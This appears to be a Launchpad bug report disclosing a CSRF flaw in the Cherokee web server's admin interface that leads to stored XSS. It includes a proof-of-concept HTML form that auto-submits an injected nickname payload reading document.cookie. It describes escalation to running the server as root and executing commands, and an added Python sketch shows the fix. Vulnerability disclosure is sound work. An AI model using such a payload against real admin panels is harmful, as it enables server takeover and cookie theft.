csrf & xss issue (resulting from csrf).

Bug #784632 reported by David on 2011-05-18
This bug affects 1 person
Affects: cherokee (Ubuntu)
Importance: Undecided
Assigned to: Unassigned

Bug Description

Binary package hint: cherokee

The cherokee admin server is vulnerable to CSRF.

Using CSRF it is possible to produce a persistent XSS in several pages - including the 'status' page via the 'nickname field' of a vserver.
An example of this is the following:

<html>
<body>
 <form action="http://127.0.0.1:9090/vserver/apply" method="post" id="xssform">
 <input type="text" name="tmp!new_droot" value='/var/www/'></input>
 <input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'></input>
</form>
<script>document.getElementById("xssform").submit();</script>
</body>
</html>

A worst-case scenario could be something like the following:
If a user is logged in and the cherokee admin server is running on localhost:9090 then if they visit a $bad page - the bad page may be able to send requests to the server so as to reconfigure it to:

1. run as root
2. the logging of error (or access) will run a command ...
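
Added example, not part of the original report and not Cherokee's own code: a sketch of the two server-side checks that address the issue described above, rejecting state-changing POSTs that lack a same-origin header and a per-session token, and escaping the stored nickname when it is rendered. The `csrf_token` field and the function names are hypothetical; the origin and the `tmp!new_nick` field come from the report's form.

```python
import hashlib
import hmac
import html
import secrets
from urllib.parse import urlsplit

# Origin of the admin UI, taken from the form action in the report.
ADMIN_ORIGIN = "http://127.0.0.1:9090"


def issue_csrf_token(session_key: bytes, session_id: str) -> str:
    """Per-session token the admin UI would embed in each form it renders."""
    return hmac.new(session_key, session_id.encode(), hashlib.sha256).hexdigest()


def is_same_origin(headers: dict) -> bool:
    """True only when Origin (or, failing that, Referer) is the admin UI."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == ADMIN_ORIGIN


def accept_post(headers: dict, form: dict, session_key: bytes, session_id: str) -> bool:
    """Gate for state-changing requests such as POST /vserver/apply."""
    expected = issue_csrf_token(session_key, session_id).encode()
    supplied = form.get("csrf_token", "").encode()
    return is_same_origin(headers) and hmac.compare_digest(supplied, expected)


def render_nick(nick: str) -> str:
    """Escape a stored nickname before writing it into the status page."""
    return html.escape(nick, quote=True)


if __name__ == "__main__":
    key, sid = secrets.token_bytes(32), "constructed-session-id"
    # Constructed requests: one from the admin UI, one shaped like the report's form.
    own = ({"Origin": ADMIN_ORIGIN}, {"tmp!new_nick": "www", "csrf_token": issue_csrf_token(key, sid)})
    foreign = ({"Origin": "http://bad.example"}, {"tmp!new_nick": '" onselect=alert(1) autofocus>'})
    for headers, form in (own, foreign):
        print(accept_post(headers, form, key, sid), render_nick(form["tmp!new_nick"]))
```

The token check stops the cross-site submission; the escaping is still needed so that a nickname already stored, or set by a legitimate admin, cannot break out of the attribute it is rendered into.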


David (d--) wrote :

minor fixy

description: updated
Changed in cherokee (Ubuntu):
status: New → Confirmed
visibility: private → public